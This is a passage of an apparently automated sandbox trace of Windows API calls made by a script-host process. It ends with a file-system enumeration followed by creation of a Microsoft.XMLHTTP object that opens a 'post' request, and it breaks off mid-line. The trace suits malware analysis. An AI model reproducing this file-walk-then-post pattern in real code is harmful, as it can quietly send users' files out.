	[0056.884] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.884] malloc (_Size=0x80) returned 0x3c8310
	[0056.884] longjmp () 
	[0056.885] longjmp () 
	[0056.885] longjmp () 
	[0056.892] GetCurrentThreadId () returned 0x9a8
	[0056.892] GetCurrentThreadId () returned 0x9a8
	[0056.892] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.892] malloc (_Size=0x80) returned 0x3c8ca0
	[0056.925] longjmp () 
	[0056.926] longjmp () 
	[0056.926] longjmp () 
	[0056.927] longjmp () 
	[0056.927] longjmp () 
	[0056.933] longjmp () 
	[0056.933] longjmp () 
	[0056.933] longjmp () 
	[0056.938] longjmp () 
	[0056.938] GetCurrentThreadId () returned 0x9a8
	[0056.939] GetCurrentThreadId () returned 0x9a8
	[0056.939] ??2@YAPEAX_K@Z () returned 0x3e4100
	[0056.939] malloc (_Size=0x80) returned 0x3c83a0
	[0056.940] GetCurrentThreadId () returned 0x9a8
	[0056.940] GetCurrentThreadId () returned 0x9a8
	[0056.940] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.940] malloc (_Size=0x80) returned 0x3c85e0
	[0056.940] longjmp () 
	[0056.940] longjmp () 
	[0056.941] longjmp () 
	[0056.942] GetCurrentThreadId () returned 0x9a8
	[0056.942] GetCurrentThreadId () returned 0x9a8
	[0056.942] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.943] malloc (_Size=0x80) returned 0x3c8670
	[0056.959] GetCurrentThreadId () returned 0x9a8
	[0056.959] GetCurrentThreadId () returned 0x9a8
	[0056.959] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.959] malloc (_Size=0x80) returned 0x3c85e0
	[0056.969] GetCurrentThreadId () returned 0x9a8
	[0056.969] GetCurrentThreadId () returned 0x9a8
	[0056.969] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.969] malloc (_Size=0x80) returned 0x3c8ca0
	[0056.971] GetCurrentThreadId () returned 0x9a8
	[0056.971] GetCurrentThreadId () returned 0x9a8
	[0056.971] ??2@YAPEAX_K@Z () returned 0x3e4300
	[0056.971] malloc (_Size=0x80) returned 0x3c8670
	[0056.972] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e060, celt=0x1, rgvar=0x26e238*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0056.973] FileSystemObject:IUnknown:Release (This=0x42e060) returned 0x0
	[0056.973] longjmp () 
	[0056.974] longjmp () 
	[0056.974] longjmp () 
	[0056.974] GetCurrentThreadId () returned 0x9a8
	[0056.974] GetCurrentThreadId () returned 0x9a8
	[0056.974] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0056.974] malloc (_Size=0x80) returned 0x3c88b0
	[0056.974] longjmp () 
	[0056.975] longjmp () 
	[0056.975] longjmp () 
	[0056.975] longjmp () 
	[0056.975] longjmp () 
	[0056.975] longjmp () 
	[0056.975] longjmp () 
	[0056.975] longjmp () 
	[0056.976] longjmp () 
	[0056.976] longjmp () 
	[0056.976] longjmp () 
	[0056.976] longjmp () 
	[0056.976] longjmp () 
	[0056.976] longjmp () 
	[0056.977] longjmp () 
	[0056.977] longjmp () 
	[0056.977] longjmp () 
	[0056.977] longjmp () 
	[0056.977] longjmp () 
	[0056.977] longjmp () 
	[0056.977] longjmp () 
	[0056.977] GetTickCount () returned 0x1147733
	[0056.978] GetTickCount () returned 0x1147733
	[0056.978] longjmp () 
	[0056.978] longjmp () 
	[0056.978] longjmp () 
	[0056.978] longjmp () 
	[0056.978] longjmp () 
	[0056.978] longjmp () 
	[0056.978] longjmp () 
	[0056.979] longjmp () 
	[0056.979] longjmp () 
	[0056.979] longjmp () 
	[0056.979] longjmp () 
	[0056.979] longjmp () 
	[0056.979] longjmp () 
	[0056.979] longjmp () 
	[0056.980] longjmp () 
	[0056.980] longjmp () 
	[0056.980] longjmp () 
	[0056.980] longjmp () 
	[0056.980] longjmp () 
	[0056.980] longjmp () 
	[0056.981] longjmp () 
	[0056.981] longjmp () 
	[0056.981] longjmp () 
	[0056.981] longjmp () 
	[0056.981] longjmp () 
	[0056.981] longjmp () 
	[0056.981] longjmp () 
	[0056.982] longjmp () 
	[0056.982] longjmp () 
	[0056.982] longjmp () 
	[0056.982] longjmp () 
	[0056.982] longjmp () 
	[0056.982] GetTickCount () returned 0x1147733
	[0056.982] longjmp () 
	[0056.982] longjmp () 
	[0056.983] longjmp () 
	[0056.983] longjmp () 
	[0056.983] longjmp () 
	[0056.983] longjmp () 
	[0056.983] longjmp () 
	[0056.983] longjmp () 
	[0056.983] longjmp () 
	[0056.984] longjmp () 
	[0056.984] longjmp () 
	[0056.984] longjmp () 
	[0056.984] longjmp () 
	[0056.984] longjmp () 
	[0056.984] longjmp () 
	[0056.984] longjmp () 
	[0056.985] longjmp () 
	[0056.985] longjmp () 
	[0056.985] longjmp () 
	[0056.985] longjmp () 
	[0056.985] longjmp () 
	[0056.985] longjmp () 
	[0056.985] longjmp () 
	[0056.986] longjmp () 
	[0056.986] longjmp () 
	[0056.986] longjmp () 
	[0056.986] longjmp () 
	[0056.986] longjmp () 
	[0056.986] longjmp () 
	[0056.987] longjmp () 
	[0056.987] longjmp () 
	[0056.987] longjmp () 
	[0056.987] GetTickCount () returned 0x1147733
	[0056.987] longjmp () 
	[0056.987] longjmp () 
	[0056.988] longjmp () 
	[0056.988] longjmp () 
	[0056.988] longjmp () 
	[0056.988] longjmp () 
	[0056.988] longjmp () 
	[0056.988] longjmp () 
	[0056.989] longjmp () 
	[0056.989] longjmp () 
	[0056.989] longjmp () 
	[0056.989] longjmp () 
	[0056.989] longjmp () 
	[0056.989] longjmp () 
	[0056.990] longjmp () 
	[0056.990] longjmp () 
	[0056.990] longjmp () 
	[0056.990] longjmp () 
	[0056.990] longjmp () 
	[0056.990] longjmp () 
	[0056.991] longjmp () 
	[0056.991] longjmp () 
	[0056.991] longjmp () 
	[0056.991] longjmp () 
	[0056.991] longjmp () 
	[0056.991] longjmp () 
	[0056.991] longjmp () 
	[0056.992] longjmp () 
	[0056.992] longjmp () 
	[0056.992] longjmp () 
	[0056.992] longjmp () 
	[0056.992] longjmp () 
	[0056.993] GetTickCount () returned 0x1147743
	[0056.993] longjmp () 
	[0056.993] longjmp () 
	[0056.993] longjmp () 
	[0056.993] longjmp () 
	[0056.993] longjmp () 
	[0056.993] longjmp () 
	[0056.993] longjmp () 
	[0056.994] longjmp () 
	[0056.994] longjmp () 
	[0056.994] longjmp () 
	[0056.994] longjmp () 
	[0056.994] longjmp () 
	[0056.994] longjmp () 
	[0056.995] longjmp () 
	[0056.995] longjmp () 
	[0056.995] longjmp () 
	[0056.995] longjmp () 
	[0056.995] longjmp () 
	[0056.995] longjmp () 
	[0056.995] longjmp () 
	[0056.996] longjmp () 
	[0056.996] longjmp () 
	[0056.996] longjmp () 
	[0056.996] longjmp () 
	[0056.996] longjmp () 
	[0056.996] longjmp () 
	[0056.997] longjmp () 
	[0056.997] longjmp () 
	[0056.997] longjmp () 
	[0056.997] longjmp () 
	[0056.997] longjmp () 
	[0056.997] longjmp () 
	[0056.998] GetTickCount () returned 0x1147743
	[0056.998] longjmp () 
	[0056.998] longjmp () 
	[0056.998] longjmp () 
	[0056.998] longjmp () 
	[0056.998] longjmp () 
	[0056.998] longjmp () 
	[0056.999] longjmp () 
	[0056.999] longjmp () 
	[0056.999] longjmp () 
	[0056.999] longjmp () 
	[0056.999] longjmp () 
	[0056.999] longjmp () 
	[0057.000] longjmp () 
	[0057.000] longjmp () 
	[0057.000] longjmp () 
	[0057.000] longjmp () 
	[0057.000] longjmp () 
	[0057.000] longjmp () 
	[0057.000] longjmp () 
	[0057.001] longjmp () 
	[0057.001] longjmp () 
	[0057.001] longjmp () 
	[0057.001] longjmp () 
	[0057.001] longjmp () 
	[0057.001] longjmp () 
	[0057.002] longjmp () 
	[0057.002] longjmp () 
	[0057.002] longjmp () 
	[0057.002] longjmp () 
	[0057.002] longjmp () 
	[0057.002] longjmp () 
	[0057.002] longjmp () 
	[0057.003] GetTickCount () returned 0x1147743
	[0057.003] longjmp () 
	[0057.003] longjmp () 
	[0057.003] longjmp () 
	[0057.003] longjmp () 
	[0057.003] longjmp () 
	[0057.004] longjmp () 
	[0057.004] longjmp () 
	[0057.004] longjmp () 
	[0057.004] longjmp () 
	[0057.004] longjmp () 
	[0057.005] longjmp () 
	[0057.005] longjmp () 
	[0057.005] longjmp () 
	[0057.005] longjmp () 
	[0057.005] longjmp () 
	[0057.005] longjmp () 
	[0057.006] longjmp () 
	[0057.006] longjmp () 
	[0057.006] longjmp () 
	[0057.006] longjmp () 
	[0057.006] longjmp () 
	[0057.006] longjmp () 
	[0057.007] longjmp () 
	[0057.007] longjmp () 
	[0057.007] longjmp () 
	[0057.007] longjmp () 
	[0057.007] longjmp () 
	[0057.007] longjmp () 
	[0057.008] longjmp () 
	[0057.008] longjmp () 
	[0057.008] longjmp () 
	[0057.008] longjmp () 
	[0057.008] GetTickCount () returned 0x1147752
	[0057.008] longjmp () 
	[0057.009] longjmp () 
	[0057.009] longjmp () 
	[0057.009] longjmp () 
	[0057.009] longjmp () 
	[0057.009] longjmp () 
	[0057.009] longjmp () 
	[0057.009] longjmp () 
	[0057.010] longjmp () 
	[0057.010] longjmp () 
	[0057.010] longjmp () 
	[0057.010] longjmp () 
	[0057.010] longjmp () 
	[0057.010] longjmp () 
	[0057.010] longjmp () 
	[0057.011] longjmp () 
	[0057.011] longjmp () 
	[0057.011] longjmp () 
	[0057.011] longjmp () 
	[0057.011] longjmp () 
	[0057.011] longjmp () 
	[0057.012] longjmp () 
	[0057.012] longjmp () 
	[0057.012] longjmp () 
	[0057.012] longjmp () 
	[0057.012] longjmp () 
	[0057.013] longjmp () 
	[0057.013] longjmp () 
	[0057.013] longjmp () 
	[0057.013] longjmp () 
	[0057.013] longjmp () 
	[0057.014] longjmp () 
	[0057.014] GetTickCount () returned 0x1147752
	[0057.014] longjmp () 
	[0057.014] longjmp () 
	[0057.014] longjmp () 
	[0057.014] longjmp () 
	[0057.014] longjmp () 
	[0057.015] longjmp () 
	[0057.015] longjmp () 
	[0057.015] longjmp () 
	[0057.015] longjmp () 
	[0057.015] longjmp () 
	[0057.015] longjmp () 
	[0057.015] longjmp () 
	[0057.016] longjmp () 
	[0057.016] longjmp () 
	[0057.016] longjmp () 
	[0057.016] longjmp () 
	[0057.016] longjmp () 
	[0057.016] longjmp () 
	[0057.017] longjmp () 
	[0057.017] longjmp () 
	[0057.017] longjmp () 
	[0057.017] longjmp () 
	[0057.017] longjmp () 
	[0057.017] longjmp () 
	[0057.018] longjmp () 
	[0057.018] longjmp () 
	[0057.018] longjmp () 
	[0057.018] longjmp () 
	[0057.018] longjmp () 
	[0057.018] longjmp () 
	[0057.019] longjmp () 
	[0057.019] longjmp () 
	[0057.019] GetTickCount () returned 0x1147762
	[0057.019] longjmp () 
	[0057.019] longjmp () 
	[0057.020] longjmp () 
	[0057.020] longjmp () 
	[0057.020] longjmp () 
	[0057.020] longjmp () 
	[0057.020] longjmp () 
	[0057.020] longjmp () 
	[0057.020] longjmp () 
	[0057.021] longjmp () 
	[0057.021] longjmp () 
	[0057.021] longjmp () 
	[0057.021] longjmp () 
	[0057.021] longjmp () 
	[0057.021] longjmp () 
	[0057.021] longjmp () 
	[0057.022] longjmp () 
	[0057.022] longjmp () 
	[0057.022] longjmp () 
	[0057.022] longjmp () 
	[0057.022] longjmp () 
	[0057.022] longjmp () 
	[0057.023] longjmp () 
	[0057.023] longjmp () 
	[0057.023] longjmp () 
	[0057.023] longjmp () 
	[0057.023] longjmp () 
	[0057.023] longjmp () 
	[0057.023] longjmp () 
	[0057.024] longjmp () 
	[0057.024] longjmp () 
	[0057.024] longjmp () 
	[0057.024] GetTickCount () returned 0x1147762
	[0057.024] longjmp () 
	[0057.024] longjmp () 
	[0057.024] longjmp () 
	[0057.024] longjmp () 
	[0057.025] longjmp () 
	[0057.025] longjmp () 
	[0057.025] longjmp () 
	[0057.025] longjmp () 
	[0057.025] longjmp () 
	[0057.026] longjmp () 
	[0057.026] longjmp () 
	[0057.026] longjmp () 
	[0057.026] longjmp () 
	[0057.026] longjmp () 
	[0057.026] longjmp () 
	[0057.026] longjmp () 
	[0057.026] longjmp () 
	[0057.027] longjmp () 
	[0057.027] longjmp () 
	[0057.027] longjmp () 
	[0057.027] longjmp () 
	[0057.027] longjmp () 
	[0057.027] longjmp () 
	[0057.027] longjmp () 
	[0057.028] longjmp () 
	[0057.028] longjmp () 
	[0057.028] longjmp () 
	[0057.028] longjmp () 
	[0057.028] longjmp () 
	[0057.028] longjmp () 
	[0057.028] longjmp () 
	[0057.028] longjmp () 
	[0057.029] GetTickCount () returned 0x1147762
	[0057.029] longjmp () 
	[0057.029] longjmp () 
	[0057.029] longjmp () 
	[0057.029] longjmp () 
	[0057.029] longjmp () 
	[0057.029] longjmp () 
	[0057.030] longjmp () 
	[0057.030] longjmp () 
	[0057.030] longjmp () 
	[0057.030] longjmp () 
	[0057.030] longjmp () 
	[0057.030] longjmp () 
	[0057.030] longjmp () 
	[0057.030] longjmp () 
	[0057.031] longjmp () 
	[0057.031] longjmp () 
	[0057.031] longjmp () 
	[0057.031] longjmp () 
	[0057.031] longjmp () 
	[0057.031] longjmp () 
	[0057.031] longjmp () 
	[0057.032] longjmp () 
	[0057.032] longjmp () 
	[0057.032] longjmp () 
	[0057.032] longjmp () 
	[0057.032] longjmp () 
	[0057.032] longjmp () 
	[0057.032] longjmp () 
	[0057.032] longjmp () 
	[0057.033] longjmp () 
	[0057.033] longjmp () 
	[0057.033] longjmp () 
	[0057.033] GetTickCount () returned 0x1147762
	[0057.033] longjmp () 
	[0057.033] longjmp () 
	[0057.033] longjmp () 
	[0057.033] longjmp () 
	[0057.033] longjmp () 
	[0057.034] longjmp () 
	[0057.034] longjmp () 
	[0057.034] longjmp () 
	[0057.034] longjmp () 
	[0057.034] longjmp () 
	[0057.034] longjmp () 
	[0057.034] longjmp () 
	[0057.035] longjmp () 
	[0057.035] longjmp () 
	[0057.035] longjmp () 
	[0057.035] longjmp () 
	[0057.035] longjmp () 
	[0057.035] longjmp () 
	[0057.035] longjmp () 
	[0057.035] longjmp () 
	[0057.036] longjmp () 
	[0057.036] longjmp () 
	[0057.036] longjmp () 
	[0057.036] longjmp () 
	[0057.036] longjmp () 
	[0057.036] longjmp () 
	[0057.036] longjmp () 
	[0057.037] longjmp () 
	[0057.037] longjmp () 
	[0057.037] longjmp () 
	[0057.037] longjmp () 
	[0057.037] longjmp () 
	[0057.037] GetTickCount () returned 0x1147771
	[0057.037] longjmp () 
	[0057.038] longjmp () 
	[0057.038] longjmp () 
	[0057.038] longjmp () 
	[0057.038] longjmp () 
	[0057.038] longjmp () 
	[0057.038] longjmp () 
	[0057.038] longjmp () 
	[0057.038] longjmp () 
	[0057.039] longjmp () 
	[0057.039] longjmp () 
	[0057.039] longjmp () 
	[0057.039] longjmp () 
	[0057.039] longjmp () 
	[0057.039] longjmp () 
	[0057.039] longjmp () 
	[0057.039] longjmp () 
	[0057.040] longjmp () 
	[0057.040] longjmp () 
	[0057.040] longjmp () 
	[0057.040] longjmp () 
	[0057.040] longjmp () 
	[0057.040] longjmp () 
	[0057.040] longjmp () 
	[0057.042] longjmp () 
	[0057.042] longjmp () 
	[0057.042] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0057.045] SysStringLen (param_1=0x0) returned 0x0
	[0057.045] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0057.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0057.324] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0057.332] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0057.333] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5b08) returned 0x0
	[0057.334] ??2@YAPEAX_K@Z () returned 0x42e060
	[0057.334] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5b08, pUnkSite=0x42e060) returned 0x0
	[0057.483] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42e060, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0057.483] XMLHTTPRequest:IUnknown:AddRef (This=0x42e060) returned 0x2
	[0057.483] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42e060, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x42e060) returned 0x0
	[0057.484] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42e060, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x42e060) returned 0x0
	[0057.484] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42e060, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0057.484] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42e060, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0057.484] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42e060, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0057.484] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42e060, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0057.485] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42e060, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0057.485] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42e060, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x42e060) returned 0x0
	[0057.486] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42e060, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0057.486] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42e060, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0057.486] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42e060, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0057.486] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42e060, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0057.486] XMLHTTPRequest:IUnknown:Release (This=0x42e060) returned 0x3
	[0057.486] XMLHTTPRequest:IUnknown:Release (This=0x42e060) returned 0x2
	[0057.486] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42e060, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x42e060) returned 0x0
	[0057.486] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42e060, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0057.486] XMLHTTPRequest:IUnknown:Release (This=0x42e060) returned 0x2
	[0057.486] XMLHTTPRequest:IUnknown:Release (This=0x47a5b08) returned 0x0
	[0057.489] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0057.489] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0057.489] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0057.489] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0057.489] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0057.489] GetTickCount () returned 0x114781d
	[0057.489] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0057.491] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0057.507] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0057.507] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0057.508] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, 